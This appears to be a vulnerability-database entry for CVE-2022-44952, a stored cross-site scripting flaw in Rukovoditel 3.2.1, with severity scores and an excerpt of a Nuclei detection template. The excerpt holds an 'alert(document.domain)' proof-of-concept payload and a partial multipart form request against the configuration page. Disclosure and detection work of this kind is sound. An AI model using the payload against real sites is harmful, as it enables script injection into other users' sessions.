CVE-2022-44952
published 2022-12-02CVE-2022-44952: Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in /index.php?module=configuration/application. This…
PriorityP429medium5.4CVSS 3.1
AVNACLPRLUIRSCCLILAN
EXPLOIT
EPSS
0.91%
55.4th percentile
Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in /index.php?module=configuration/application. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Copyright Text field after clicking "Add".
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| rukovoditel | rukovoditel | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Nuclei
Rukovoditel <= 3.2.1 - Cross Site Scripting
nuclei·CVSS 5.4
CVE-2022-44952 [MEDIUM] Rukovoditel <= 3.2.1 - Cross Site Scripting
Rukovoditel alert(document.domain)
------WebKitFormBoundaryMh2HSjWbM7zJjWOA
Content-Disposition: form-data; name="CFG[APP_LANGUAGE]"
english.php
------WebKitFormBoundaryMh2HSjWbM7zJjWOA
Content-Disposition: form-data; name="CFG[APP_SKIN]"
------WebKitFormBoundaryMh2HSjWbM7zJjWOA
Content-Disposition: form-data; name="CFG[APP_TIMEZONE]"
America/New_York
------WebKitFormBoundaryMh2HSjWbM7zJjWOA
Content-Disposition: form-data; name="CFG[APP_ROWS_PER_PAGE]"
10
------WebKitFormBoundaryMh2HSjWbM7zJjWOA
Content-Disposition: form-data; name="CFG[APP_DATE_FORMAT]"
m/d/Y
------WebKitFormBoundaryMh2HSjWbM7zJjWOA
Content-Disposition: form-data; name="CFG[APP_DATETIME_FORMAT]"
m/d/Y H:i
------WebKitFormBoundaryMh2HSjWbM7zJjWOA
Content-Disposition: form-data; name="CFG[APP_NUMBER_FORMAT]"
2/./*
-
No writeups or analysis indexed.
2022-12-02
Published